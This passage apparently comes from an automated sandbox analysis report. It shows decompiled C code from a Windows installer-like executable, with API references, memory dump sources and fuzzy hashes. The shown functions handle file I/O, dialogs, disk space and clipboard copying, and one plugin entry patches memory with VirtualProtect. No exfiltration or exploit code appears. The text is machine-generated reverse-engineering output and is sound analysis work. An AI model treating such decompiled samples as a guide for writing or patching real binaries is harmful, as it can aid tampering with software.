                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}





                                                          0x00405e62
                                                          0x00405e72
                                                          0x00405e7a
                                                          0x00000000
                                                          0x00405e81
                                                          0x00000000
                                                          0x00405e83

                                                          APIs
                                                          • ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0041D460,00415460,0040343B,0040A130,0040A130,0040333F,0041D460,00004000,?,00000000,004031E9), ref: 00405E72
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileRead
                                                          • String ID:
                                                          • API String ID: 2738559852-0
                                                          • Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                          • Instruction ID: 7c3f96e10be73f403a44b868b48459b61dea37020128cbb38d3373314b5f95ad
                                                          • Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
                                                          • Instruction Fuzzy Hash: 79E0B63221465AAFDF509F95DC00AEB7B6CEB15260F004836BE59E2190D631EA21DAE8
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E00405E8D(void* _a4, void* _a8, long _a12) {
                                                          				int _t7;
                                                          				long _t11;
                                                          
                                                          				_t11 = _a12;
                                                          				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                          				if(_t7 == 0 || _t11 != _a12) {
                                                          					return 0;
                                                          				} else {
                                                          					return 1;
                                                          				}
                                                          			}





                                                          0x00405e91
                                                          0x00405ea1
                                                          0x00405ea9
                                                          0x00000000
                                                          0x00405eb0
                                                          0x00000000
                                                          0x00405eb2

                                                          APIs
                                                          • WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,00415F10,00415460,004033BF,00415460,00415F10,0040B8A0,0041D460,00004000,?,00000000,004031E9), ref: 00405EA1
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FileWrite
                                                          • String ID:
                                                          • API String ID: 3934441357-0
                                                          • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction ID: 65ef4e0bd98581bd1f6bd632b42787c8420692956f3b06be75fa4a484c2a9a78
                                                          • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                          • Instruction Fuzzy Hash: FFE08C3220125AABEF119F60CC00AEB3B6CFB04361F004433FAA4E3140E230E9208BE4
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                          
                                                          				 *0x740d4038 = _a4;
                                                          				if(_a8 == 1) {
                                                          					VirtualProtect(0x740d404c, 4, 0x40, 0x740d403c); // executed
                                                          					 *0x740d404c = 0xc2;
                                                          					 *0x740d403c = 0;
                                                          					 *0x740d4044 = 0;
                                                          					 *0x740d4058 = 0;
                                                          					 *0x740d4048 = 0;
                                                          					 *0x740d4040 = 0;
                                                          					 *0x740d4050 = 0;
                                                          					 *0x740d404e = 0;
                                                          				}
                                                          				return 1;
                                                          			}



                                                          0x740d292a
                                                          0x740d292f
                                                          0x740d293f
                                                          0x740d2947
                                                          0x740d294e
                                                          0x740d2953
                                                          0x740d2958
                                                          0x740d295d
                                                          0x740d2962
                                                          0x740d2967
                                                          0x740d296c
                                                          0x740d296c
                                                          0x740d2974

                                                          APIs
                                                          • VirtualProtect.KERNELBASE(740D404C,00000004,00000040,740D403C), ref: 740D293F
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.211149237.00000000740D1000.00000020.00020000.sdmp, Offset: 740D0000, based on PE: true
                                                          • Associated: 00000001.00000002.211137968.00000000740D0000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211158192.00000000740D3000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.211175377.00000000740D5000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: ProtectVirtual
                                                          • String ID:
                                                          • API String ID: 544645111-0
                                                          • Opcode ID: 5c625d0bfcdab8a81d6b6afb2d8475445b53b5e87b932fc0cfb4b63eed4f03dc
                                                          • Instruction ID: 2a847ec7282941fb84115a4b11e2744ee626a649905819f421903777a341315f
                                                          • Opcode Fuzzy Hash: 5c625d0bfcdab8a81d6b6afb2d8475445b53b5e87b932fc0cfb4b63eed4f03dc
                                                          • Instruction Fuzzy Hash: 34F022B37A8380DFC360CF7A94447857EE1E759655B2185BAEA9CD7242E374414C8F11
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E0040343E(long _a4) {
                                                          				long _t2;
                                                          
                                                          				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                          				return _t2;
                                                          			}




                                                          0x0040344c
                                                          0x00403452

                                                          APIs
                                                          • SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: FilePointer
                                                          • String ID:
                                                          • API String ID: 973152223-0
                                                          • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                          • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                          • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          Non-executed Functions

                                                          C-Code - Quality: 96%
                                                          			E004054B2(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                          				struct HWND__* _v8;
                                                          				struct tagRECT _v24;
                                                          				void* _v32;
                                                          				signed int _v36;
                                                          				int _v40;
                                                          				int _v44;
                                                          				signed int _v48;
                                                          				int _v52;
                                                          				void* _v56;
                                                          				void* _v64;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				struct HWND__* _t87;
                                                          				struct HWND__* _t89;
                                                          				long _t90;
                                                          				int _t95;
                                                          				int _t96;
                                                          				long _t99;
                                                          				void* _t102;
                                                          				intOrPtr _t124;
                                                          				struct HWND__* _t128;
                                                          				int _t150;
                                                          				int _t153;
                                                          				long _t157;
                                                          				struct HWND__* _t161;
                                                          				struct HMENU__* _t163;
                                                          				long _t165;
                                                          				void* _t166;
                                                          				char* _t167;
                                                          				char* _t168;
                                                          				int _t169;
                                                          
                                                          				_t87 =  *0x42ec24; // 0x0
                                                          				_t157 = _a8;
                                                          				_t150 = 0;
                                                          				_v8 = _t87;
                                                          				if(_t157 != 0x110) {
                                                          					__eflags = _t157 - 0x405;
                                                          					if(_t157 == 0x405) {
                                                          						CloseHandle(CreateThread(0, 0, E00405446, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
                                                          					}
                                                          					__eflags = _t157 - 0x111;
                                                          					if(_t157 != 0x111) {
                                                          						L17:
                                                          						__eflags = _t157 - 0x404;
                                                          						if(_t157 != 0x404) {
                                                          							L25:
                                                          							__eflags = _t157 - 0x7b;
                                                          							if(_t157 != 0x7b) {
                                                          								goto L20;
                                                          							}
                                                          							_t89 = _v8;
                                                          							__eflags = _a12 - _t89;
                                                          							if(_a12 != _t89) {
                                                          								goto L20;
                                                          							}
                                                          							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
                                                          							__eflags = _t90 - _t150;
                                                          							_a12 = _t90;
                                                          							if(_t90 <= _t150) {
                                                          								L36:
                                                          								return 0;
                                                          							}
                                                          							_t163 = CreatePopupMenu();
                                                          							AppendMenuA(_t163, _t150, 1, E004062E0(_t150, _t157, _t163, _t150, 0xffffffe1));
                                                          							_t95 = _a16;
                                                          							__eflags = _a16 - 0xffffffff;
                                                          							_t153 = _a16 >> 0x10;
                                                          							if(_a16 == 0xffffffff) {
                                                          								GetWindowRect(_v8,  &_v24);
                                                          								_t95 = _v24.left;
                                                          								_t153 = _v24.top;
                                                          							}
                                                          							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
                                                          							__eflags = _t96 - 1;
                                                          							if(_t96 == 1) {
                                                          								_t165 = 1;
                                                          								__eflags = 1;
                                                          								_v56 = _t150;
                                                          								_v44 = 0x42a8b8;
                                                          								_v40 = 0x1000;
                                                          								_a4 = _a12;
                                                          								do {
                                                          									_a4 = _a4 - 1;
                                                          									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
                                                          									__eflags = _a4 - _t150;
                                                          									_t165 = _t165 + _t99 + 2;
                                                          								} while (_a4 != _t150);
                                                          								OpenClipboard(_t150);
                                                          								EmptyClipboard();
                                                          								_t102 = GlobalAlloc(0x42, _t165);
                                                          								_a4 = _t102;
                                                          								_t166 = GlobalLock(_t102);
                                                          								do {
                                                          									_v44 = _t166;
                                                          									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
                                                          									 *_t167 = 0xd;
                                                          									_t168 = _t167 + 1;
                                                          									 *_t168 = 0xa;
                                                          									_t166 = _t168 + 1;
                                                          									_t150 = _t150 + 1;
                                                          									__eflags = _t150 - _a12;
                                                          								} while (_t150 < _a12);
                                                          								GlobalUnlock(_a4);
                                                          								SetClipboardData(1, _a4);
                                                          								CloseClipboard();
                                                          							}
                                                          							goto L36;
                                                          						}
                                                          						__eflags =  *0x42ec0c - _t150; // 0x0
                                                          						if(__eflags == 0) {
                                                          							ShowWindow( *0x42f448, 8);
                                                          							__eflags =  *0x42f4ec - _t150;
                                                          							if( *0x42f4ec == _t150) {
                                                          								E00405374( *((intOrPtr*)( *0x42a090 + 0x34)), _t150);
                                                          							}
                                                          							E004042AA(1);
                                                          							goto L25;
                                                          						}
                                                          						 *0x429c88 = 2;
                                                          						E004042AA(0x78);
                                                          						goto L20;
                                                          					} else {
                                                          						__eflags = _a12 - 0x403;
                                                          						if(_a12 != 0x403) {
                                                          							L20:
                                                          							return E00404338(_t157, _a12, _a16);
                                                          						}
                                                          						ShowWindow( *0x42ec10, _t150);
                                                          						ShowWindow(_v8, 8);
                                                          						E00404306(_v8);
                                                          						goto L17;
                                                          					}
                                                          				}
                                                          				_v48 = _v48 | 0xffffffff;
                                                          				_v36 = _v36 | 0xffffffff;
                                                          				_t169 = 2;
                                                          				_v56 = _t169;
                                                          				_v52 = 0;
                                                          				_v44 = 0;
                                                          				_v40 = 0;
                                                          				asm("stosd");
                                                          				asm("stosd");
                                                          				_t124 =  *0x42f454;
                                                          				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
                                                          				_a8 =  *((intOrPtr*)(_t124 + 0x60));
                                                          				 *0x42ec10 = GetDlgItem(_a4, 0x403);
                                                          				 *0x42ec08 = GetDlgItem(_a4, 0x3ee);
                                                          				_t128 = GetDlgItem(_a4, 0x3f8);
                                                          				 *0x42ec24 = _t128;
                                                          				_v8 = _t128;
                                                          				E00404306( *0x42ec10);
                                                          				 *0x42ec14 = E00404BF7(4);
                                                          				 *0x42ec2c = 0;
                                                          				GetClientRect(_v8,  &_v24);
                                                          				_v48 = _v24.right - GetSystemMetrics(_t169);
                                                          				SendMessageA(_v8, 0x101b, 0,  &_v56);
                                                          				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
                                                          				if(_a12 >= 0) {
                                                          					SendMessageA(_v8, 0x1001, 0, _a12);
                                                          					SendMessageA(_v8, 0x1026, 0, _a12);
                                                          				}
                                                          				if(_a8 >= _t150) {
                                                          					SendMessageA(_v8, 0x1024, _t150, _a8);
                                                          				}
                                                          				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          				_push(0x1b);
                                                          				E004042D1(_a4);
                                                          				if(( *0x42f45c & 0x00000003) != 0) {
                                                          					ShowWindow( *0x42ec10, _t150);
                                                          					if(( *0x42f45c & 0x00000002) != 0) {
                                                          						 *0x42ec10 = _t150;
                                                          					} else {
                                                          						ShowWindow(_v8, 8);
                                                          					}
                                                          					E00404306( *0x42ec08);
                                                          				}
                                                          				_t161 = GetDlgItem(_a4, 0x3ec);
                                                          				SendMessageA(_t161, 0x401, _t150, 0x75300000);
                                                          				if(( *0x42f45c & 0x00000004) != 0) {
                                                          					SendMessageA(_t161, 0x409, _t150, _a8);
                                                          					SendMessageA(_t161, 0x2001, _t150, _a12);
                                                          				}
                                                          				goto L36;
                                                          			}



































                                                          0x004054b8
                                                          0x004054c0
                                                          0x004054c3
                                                          0x004054cb
                                                          0x004054ce
                                                          0x0040565d
                                                          0x00405663
                                                          0x00405687
                                                          0x00405687
                                                          0x00405693
                                                          0x00405699
                                                          0x004056bb
                                                          0x004056bb
                                                          0x004056c1
                                                          0x00405716
                                                          0x00405716
                                                          0x00405719
                                                          0x00000000
                                                          0x00000000
                                                          0x0040571b
                                                          0x0040571e
                                                          0x00405721
                                                          0x00000000
                                                          0x00000000
                                                          0x0040572b
                                                          0x00405731
                                                          0x00405733
                                                          0x00405736
                                                          0x00405833
                                                          0x00000000
                                                          0x00405833
                                                          0x00405745
                                                          0x00405751
                                                          0x0040575a
                                                          0x00405761
                                                          0x00405765
                                                          0x00405768
                                                          0x00405771
                                                          0x00405777
                                                          0x0040577a
                                                          0x0040577a
                                                          0x0040578a
                                                          0x00405790
                                                          0x00405793
                                                          0x0040579e
                                                          0x0040579e
                                                          0x0040579f
                                                          0x004057a2
                                                          0x004057a9
                                                          0x004057b0
                                                          0x004057b8
                                                          0x004057b8
                                                          0x004057c6
                                                          0x004057cc
                                                          0x004057cf
                                                          0x004057cf
                                                          0x004057d6
                                                          0x004057dc
                                                          0x004057e5
                                                          0x004057ec
                                                          0x004057f5
                                                          0x004057f7
                                                          0x004057fa
                                                          0x00405809
                                                          0x0040580b
                                                          0x0040580e
                                                          0x0040580f
                                                          0x00405812
                                                          0x00405813
                                                          0x00405814
                                                          0x00405814
                                                          0x0040581c
                                                          0x00405827
                                                          0x0040582d
                                                          0x0040582d
                                                          0x00000000
                                                          0x00405793
                                                          0x004056c3
                                                          0x004056c9
                                                          0x004056f7
                                                          0x004056f9
                                                          0x004056ff
                                                          0x0040570a
                                                          0x0040570a
                                                          0x00405711
                                                          0x00000000
                                                          0x00405711
                                                          0x004056cd
                                                          0x004056d7
                                                          0x00000000
                                                          0x0040569b
                                                          0x0040569b
                                                          0x004056a1
                                                          0x004056dc
                                                          0x00000000
                                                          0x004056e3
                                                          0x004056aa
                                                          0x004056b1
                                                          0x004056b6
                                                          0x00000000
                                                          0x004056b6
                                                          0x00405699
                                                          0x004054d4
                                                          0x004054d8
                                                          0x004054e0
                                                          0x004054e4
                                                          0x004054e7
                                                          0x004054ea
                                                          0x004054ed
                                                          0x004054f0
                                                          0x004054f1
                                                          0x004054f2
                                                          0x0040550b
                                                          0x0040550e
                                                          0x00405518
                                                          0x00405527
                                                          0x0040552f
                                                          0x00405537
                                                          0x0040553c
                                                          0x0040553f
                                                          0x0040554b
                                                          0x00405554
                                                          0x0040555d
                                                          0x0040557f
                                                          0x00405585
                                                          0x00405596
                                                          0x0040559b
                                                          0x004055a9
                                                          0x004055b7
                                                          0x004055b7
                                                          0x004055bc
                                                          0x004055ca
                                                          0x004055ca
                                                          0x004055cf
                                                          0x004055d2
                                                          0x004055d7
                                                          0x004055e3
                                                          0x004055ec
                                                          0x004055f9
                                                          0x00405608
                                                          0x004055fb
                                                          0x00405600
                                                          0x00405600
                                                          0x00405614
                                                          0x00405614
                                                          0x00405628
                                                          0x00405631
                                                          0x0040563a
                                                          0x0040564a
                                                          0x00405656
                                                          0x00405656
                                                          0x00000000

                                                          APIs
                                                          • GetDlgItem.USER32 ref: 00405511
                                                          • GetDlgItem.USER32 ref: 00405520
                                                          • GetClientRect.USER32 ref: 0040555D
                                                          • GetSystemMetrics.USER32 ref: 00405564
                                                          • SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405585
                                                          • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405596
                                                          • SendMessageA.USER32(?,00001001,00000000,?), ref: 004055A9
                                                          • SendMessageA.USER32(?,00001026,00000000,?), ref: 004055B7
                                                          • SendMessageA.USER32(?,00001024,00000000,?), ref: 004055CA
                                                          • ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055EC
                                                          • ShowWindow.USER32(?,00000008), ref: 00405600
                                                          • GetDlgItem.USER32 ref: 00405621
                                                          • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 00405631
                                                          • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 0040564A
                                                          • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405656
                                                          • GetDlgItem.USER32 ref: 0040552F
                                                            • Part of subcall function 00404306: SendMessageA.USER32(00000028,?,00000001,00404136), ref: 00404314
                                                          • GetDlgItem.USER32 ref: 00405672
                                                          • CreateThread.KERNEL32 ref: 00405680
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405687
                                                          • ShowWindow.USER32(00000000), ref: 004056AA
                                                          • ShowWindow.USER32(?,00000008), ref: 004056B1
                                                          • ShowWindow.USER32(00000008), ref: 004056F7
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 0040572B
                                                          • CreatePopupMenu.USER32 ref: 0040573C
                                                          • AppendMenuA.USER32 ref: 00405751
                                                          • GetWindowRect.USER32 ref: 00405771
                                                          • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040578A
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057C6
                                                          • OpenClipboard.USER32(00000000), ref: 004057D6
                                                          • EmptyClipboard.USER32 ref: 004057DC
                                                          • GlobalAlloc.KERNEL32(00000042,?), ref: 004057E5
                                                          • GlobalLock.KERNEL32 ref: 004057EF
                                                          • SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405803
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 0040581C
                                                          • SetClipboardData.USER32 ref: 00405827
                                                          • CloseClipboard.USER32 ref: 0040582D
                                                          Memory Dump Source
                                                          • Source File: 00000001.00000002.210091927.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000001.00000002.210082002.0000000000400000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210106552.0000000000408000.00000002.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210112543.000000000040A000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210125931.000000000041D000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210140602.000000000042C000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210144999.0000000000435000.00000004.00020000.sdmp Download File
                                                          • Associated: 00000001.00000002.210150471.0000000000438000.00000002.00020000.sdmp Download File
                                                          Similarity
                                                          • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                          • String ID:
                                                          • API String ID: 590372296-0
                                                          • Opcode ID: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                          • Instruction ID: 3d94e6139f86797c0ae92d92c46aaabaef2c33f238587a010477577dd15b8479
                                                          • Opcode Fuzzy Hash: 6d179e6958cb8dc4fcc0aa3cf4094303a3980cc41fe803e009c8272a4b93c80d
                                                          • Instruction Fuzzy Hash: 1BA17C71900608BFDB11AFA1DE45EAE3B79FB08354F40443AFA45B61A0CB754E51DF68
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 78%
                                                          			E00404763(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                          				signed int _v8;
                                                          				signed int _v12;
                                                          				long _v16;
                                                          				long _v20;
                                                          				long _v24;
                                                          				char _v28;
                                                          				intOrPtr _v32;
                                                          				long _v36;
                                                          				char _v40;
                                                          				unsigned int _v44;
                                                          				signed int _v48;
                                                          				CHAR* _v56;
                                                          				intOrPtr _v60;
                                                          				intOrPtr _v64;
                                                          				intOrPtr _v68;
                                                          				CHAR* _v72;
                                                          				void _v76;
                                                          				struct HWND__* _v80;
                                                          				void* __ebx;
                                                          				void* __edi;
                                                          				void* __esi;
                                                          				intOrPtr _t82;
                                                          				long _t87;
                                                          				signed char* _t89;
                                                          				void* _t95;
                                                          				signed int _t96;
                                                          				int _t109;
                                                          				signed char _t114;
                                                          				signed int _t118;
                                                          				struct HWND__** _t122;
                                                          				intOrPtr* _t138;
                                                          				CHAR* _t146;
                                                          				intOrPtr _t147;
                                                          				unsigned int _t150;
                                                          				signed int _t152;
                                                          				unsigned int _t156;
                                                          				signed int _t158;
                                                          				signed int* _t159;
                                                          				signed char* _t160;
                                                          				struct HWND__* _t165;
                                                          				struct HWND__* _t166;
                                                          				int _t168;
                                                          				unsigned int _t197;
                                                          
                                                          				_t156 = __edx;
                                                          				_t82 =  *0x42a090;
                                                          				_v32 = _t82;
                                                          				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                          				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                          				if(_a8 == 0x40b) {
                                                          					E0040594D(0x3fb, _t146);
                                                          					E00406528(_t146);
                                                          				}
                                                          				_t166 = _a4;
                                                          				if(_a8 != 0x110) {
                                                          					L8:
                                                          					if(_a8 != 0x111) {
                                                          						L20:
                                                          						if(_a8 == 0x40f) {
                                                          							L22:
                                                          							_v8 = _v8 & 0x00000000;
                                                          							_v12 = _v12 & 0x00000000;
                                                          							E0040594D(0x3fb, _t146);
                                                          							if(E00405CD3(_t185, _t146) == 0) {
                                                          								_v8 = 1;
                                                          							}
                                                          							E0040624D(0x429888, _t146);
                                                          							_t87 = E00406656(1);
                                                          							_v16 = _t87;
                                                          							if(_t87 == 0) {
                                                          								L30:
                                                          								E0040624D(0x429888, _t146);
                                                          								_t89 = E00405C7E(0x429888);
                                                          								_t158 = 0;
                                                          								if(_t89 != 0) {
                                                          									 *_t89 =  *_t89 & 0x00000000;
                                                          								}
                                                          								if(GetDiskFreeSpaceA(0x429888,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                          									goto L35;
                                                          								} else {
                                                          									_t168 = 0x400;
                                                          									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                          									asm("cdq");
                                                          									_v48 = _t109;
                                                          									_v44 = _t156;
                                                          									_v12 = 1;
                                                          									goto L36;
                                                          								}
                                                          							} else {
                                                          								_t159 = 0;
                                                          								if(0 == 0x429888) {
                                                          									goto L30;
                                                          								} else {
                                                          									goto L26;
                                                          								}
                                                          								while(1) {
                                                          									L26:
                                                          									_t114 = _v16(0x429888,  &_v48,  &_v28,  &_v40);
                                                          									if(_t114 != 0) {
                                                          										break;
                                                          									}
                                                          									if(_t159 != 0) {
                                                          										 *_t159 =  *_t159 & _t114;
                                                          									}
                                                          									_t160 = E00405C2C(0x429888);
                                                          									 *_t160 =  *_t160 & 0x00000000;
                                                          									_t159 = _t160 - 1;
                                                          									 *_t159 = 0x5c;
                                                          									if(_t159 != 0x429888) {
                                                          										continue;
                                                          									} else {
                                                          										goto L30;
                                                          									}
                                                          								}
                                                          								_t150 = _v44;
                                                          								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
                                                          								_v44 = _t150 >> 0xa;
                                                          								_v12 = 1;
                                                          								_t158 = 0;
                                                          								__eflags = 0;
                                                          								L35:
                                                          								_t168 = 0x400;
                                                          								L36:
                                                          								_t95 = E00404BF7(5);
                                                          								if(_v12 != _t158) {
                                                          									_t197 = _v44;
                                                          									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
                                                          										_v8 = 2;
                                                          									}
                                                          								}
                                                          								_t147 =  *0x42ec1c; // 0x53f080
                                                          								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
                                                          									E00404BDF(0x3ff, 0xfffffffb, _t95);
                                                          									if(_v12 == _t158) {
                                                          										SetDlgItemTextA(_a4, _t168, 0x429878);
                                                          									} else {
                                                          										E00404B1A(_t168, 0xfffffffc, _v48, _v44);
                                                          									}
                                                          								}
                                                          								_t96 = _v8;
                                                          								 *0x42f504 = _t96;
                                                          								if(_t96 == _t158) {
                                                          									_v8 = E0040140B(7);
                                                          								}
                                                          								if(( *(_v32 + 0x14) & _t168) != 0) {
                                                          									_v8 = _t158;
                                                          								}
                                                          								E004042F3(0 | _v8 == _t158);
                                                          								if(_v8 == _t158 &&  *0x42a8a8 == _t158) {
                                                          									E004046BC();
                                                          								}
                                                          								 *0x42a8a8 = _t158;
                                                          								goto L53;
                                                          							}
                                                          						}
                                                          						_t185 = _a8 - 0x405;
                                                          						if(_a8 != 0x405) {
                                                          							goto L53;
                                                          						}
                                                          						goto L22;
                                                          					}
                                                          					_t118 = _a12 & 0x0000ffff;
                                                          					if(_t118 != 0x3fb) {
                                                          						L12:
                                                          						if(_t118 == 0x3e9) {
                                                          							_t152 = 7;
                                                          							memset( &_v76, 0, _t152 << 2);
                                                          							_v80 = _t166;
                                                          							_v72 = 0x42a8b8;
                                                          							_v60 = E00404AB4;
                                                          							_v56 = _t146;
                                                          							_v68 = E004062E0(_t146, 0x42a8b8, _t166, 0x429c90, _v12);
                                                          							_t122 =  &_v80;
                                                          							_v64 = 0x41;
                                                          							__imp__SHBrowseForFolderA(_t122);
                                                          							if(_t122 == 0) {
                                                          								_a8 = 0x40f;
                                                          							} else {
                                                          								__imp__CoTaskMemFree(_t122);
                                                          								E00405BE5(_t146);
                                                          								_t125 =  *((intOrPtr*)( *0x42f454 + 0x11c));
                                                          								if( *((intOrPtr*)( *0x42f454 + 0x11c)) != 0 && _t146 == "C:\\Users\\hardz\\AppData\\Local\\Temp") {
                                                          									E004062E0(_t146, 0x42a8b8, _t166, 0, _t125);
                                                          									if(lstrcmpiA(0x42e3e0, 0x42a8b8) != 0) {
                                                          										lstrcatA(_t146, 0x42e3e0);
                                                          									}
                                                          								}
                                                          								 *0x42a8a8 =  *0x42a8a8 + 1;
                                                          								SetDlgItemTextA(_t166, 0x3fb, _t146);
                                                          							}
                                                          						}
                                                          						goto L20;
                                                          					}
                                                          					if(_a12 >> 0x10 != 0x300) {
                                                          						goto L53;
                                                          					}
                                                          					_a8 = 0x40f;
                                                          					goto L12;
                                                          				} else {
                                                          					_t165 = GetDlgItem(_t166, 0x3fb);
                                                          					if(E00405C52(_t146) != 0 && E00405C7E(_t146) == 0) {
                                                          						E00405BE5(_t146);
                                                          					}
                                                          					 *0x42ec18 = _t166;
                                                          					SetWindowTextA(_t165, _t146);
                                                          					_push( *((intOrPtr*)(_a16 + 0x34)));
                                                          					_push(1);
                                                          					E004042D1(_t166);
                                                          					_push( *((intOrPtr*)(_a16 + 0x30)));
                                                          					_push(0x14);
                                                          					E004042D1(_t166);
                                                          					E00404306(_t165);
                                                          					_t138 = E00406656(8);
                                                          					if(_t138 == 0) {
                                                          						L53:
                                                          						return E00404338(_a8, _a12, _a16);
                                                          					} else {
                                                          						 *_t138(_t165, 1);
                                                          						goto L8;
                                                          					}
                                                          				}
                                                          			}














































                                                          0x00404763
                                                          0x00404769
                                                          0x0040476f
                                                          0x0040477c
                                                          0x0040478a
                                                          0x0040478d
                                                          0x00404795
                                                          0x0040479b
                                                          0x0040479b
                                                          0x004047a7
                                                          0x004047aa
                                                          0x00404818
                                                          0x0040481f
                                                          0x004048f6
